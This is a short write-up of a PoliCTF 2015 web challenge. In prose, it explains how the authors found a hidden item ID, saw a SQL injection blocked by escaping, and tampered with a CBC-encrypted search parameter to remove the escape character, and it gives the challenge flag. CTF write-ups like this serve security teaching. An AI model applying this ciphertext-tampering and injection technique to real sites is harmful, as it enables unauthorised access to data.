English [PoliCTF 2015] [Web 150 – John The Referee] Write Up

JOHN THE REFEREE

150 Points – SOLVED
John is one of the most famous referee and security expert in the world. He loves encryption and his referee uniforms. You can find them on his online store.
Unfortunatly his best uniform is not on sale for anyone. I know that it is available only on invitation. I want that uniform!
referee.polictf.it

At first, we’re landing on a webpage showing us some shirts to buy, and we have to find THE one wich not on sale.

We can also see that there is a search engine, which seems to be only looking for shirt names, using weird URL (which could be encrypted)

Referee home

Our first thought was to check if these shirts were identified by an ID (as usual) which is the case : URLs leading to shirts details look like this : /uniform/<ID>

By studying the html code of the main shirts page, we can clearly see that the shirt with ID 9 is missing.

id jump

In order to be sure, we could try to load what could be the image of the shirt, with this url : /static/images/9.jpg, which leads to a cute lady (sweet 🙂 )

9

Obviously,  modifying the URL of a shirt detail page by replacing a real ID by 9 (trying to load /uniform/9 in short) doesn’t work. The harder, the funnier !

We now must try some attacks on the search engine. We’ll begin with an woooonderful SQL Injection (strange isn’t it 🙂 )

Strange url

Unfortunately, the SQL Injection didn’t work, the quote is escaped.

When a search is done, the search request send us a 302 Location found, leading to an URL /search-result/<weird_parameter>
Simply loading the URL with the weird parameter shows us the search string, meaning that our search string is in the long weird parameter.
After a few tests, we saw that modifying the beginning of the parameter doesn’t give us an error, but changes the first character.
Maybe we can try to modify it, in order to get rid of the escaping character.

Exploited

YES, we finally found the flag : flag{Damn_John!_CBC_1s_not_the_best_s0lution_in_this_c4se}

Leave a Reply

Your email address will not be published. Required fields are marked *